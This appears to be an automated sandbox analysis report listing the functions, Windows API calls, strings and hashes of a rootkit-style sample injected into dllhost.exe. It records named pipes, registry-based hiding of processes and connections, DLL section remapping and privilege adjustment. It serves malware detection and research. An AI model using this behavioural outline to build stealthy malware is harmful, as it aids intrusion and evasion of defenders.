API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
registrymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 000000014000327C

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

RegOpenKeyExW.ADVAPI32 ref: 000000014000330D
RegDeleteValueW.ADVAPI32 ref: 0000000140003325
RegDeleteValueW.ADVAPI32 ref: 0000000140003339
RegDeleteValueW.ADVAPI32 ref: 000000014000334D
ExitProcess.KERNEL32 ref: 0000000140003384
GetProcessHeap.KERNEL32 ref: 000000014000338B
HeapAlloc.KERNEL32 ref: 000000014000339E
K32EnumProcesses.KERNEL32 ref: 00000001400033BB
ExitProcess.KERNEL32 ref: 0000000140003479

Strings

open, xrefs: 000000014000357B
$rbx-stager, xrefs: 000000014000331E
SOFTWARE, xrefs: 00000001400032FF
$rbx-dll32, xrefs: 0000000140003332
$rbx-svc32, xrefs: 0000000140003353
$rbx-dll64, xrefs: 0000000140003346
$rbx-svc64, xrefs: 000000014000335F

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
API String ID: 4225498131-1538754800
Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
HeapFree.KERNEL32 ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.KERNELBASE ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

SOFTWARE\$rbx-config, xrefs: 0000000140001586
tcp_local, xrefs: 00000001400016F2
process_names, xrefs: 0000000140001641
tcp_remote, xrefs: 000000014000172D
pid, xrefs: 0000000140001606
startup, xrefs: 00000001400015C9
udp, xrefs: 0000000140001768
paths, xrefs: 000000014000167C
service_names, xrefs: 00000001400016B7

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3414887735
Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

.text, xrefs: 0000000140002B54
C:\Windows\System32\, xrefs: 0000000140002A2F

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 000000014000374D
ConnectNamedPipe.KERNELBASE ref: 000000014000375A
ReadFile.KERNELBASE ref: 000000014000377D
WriteFile.KERNEL32 ref: 00000001400037AB
Sleep.KERNEL32 ref: 00000001400037B8
DisconnectNamedPipe.KERNELBASE ref: 00000001400037C1

Strings

\\.\pipe\$rbx-childproc, xrefs: 0000000140003735
M, xrefs: 000000014000379E

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$rbx-childproc
API String ID: 2203880229-2840927681
Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$rbx-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$rbx-control
API String ID: 2071455217-3647231676
Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003683
HeapAlloc.KERNEL32 ref: 0000000140003697
GetProcessHeap.KERNEL32 ref: 00000001400036A0
HeapAlloc.KERNEL32 ref: 00000001400036AE
K32EnumProcesses.KERNEL32 ref: 00000001400036C9
SleepEx.KERNELBASE ref: 000000014000371E

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: HeapFree.KERNEL32 ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Function 0000017C6DD7F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000017C6DD7F611
GetFileType.KERNELBASE ref: 0000017C6DD7F627

Memory Dump Source

Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true

Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 6141628bdf6e6aab5108ff819d0260e3d6a4a008ae601445022bf64e978f936c
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 89314F32618B4491EF70AB2595C02AD6A60F345BB0F69134DEBAE573F0CB35D4E1D3A0

Function 0000017C6DABF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000017C6DABF611
GetFileType.KERNELBASE ref: 0000017C6DABF627

Memory Dump Source

Source File: 00000025.00000002.2989903575.0000017C6DAB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DAB0000, based on PE: true

Associated: 00000025.00000002.2988620981.0000017C6DAB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2991621779.0000017C6DAC5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2992926886.0000017C6DAD0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2994289215.0000017C6DAD2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2995505303.0000017C6DAD9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_17c6dab0000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: a3ad8f93b9f208413b01876a198c8e85ff18750fbf0b7c33acbdbdc8302fa70f
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 24318F3661CB8495EF608B2495E02A92661F345BB0F68130DEF6E073F2CB36D4E2D380

Function 0000017C6DA82EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000017C6DA8302E

Memory Dump Source

Source File: 00000025.00000003.2618691354.0000017C6DA80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017C6DA80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_17c6da80000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: e260be4d35421084bcb3cdf8b952b5aac700febf79770c3e91d4be6cc4715d85
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 5991F472B0919087DF648F25D4807ADB3A1FB55F95F548128AE8D877CADA34D8D3C740

Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
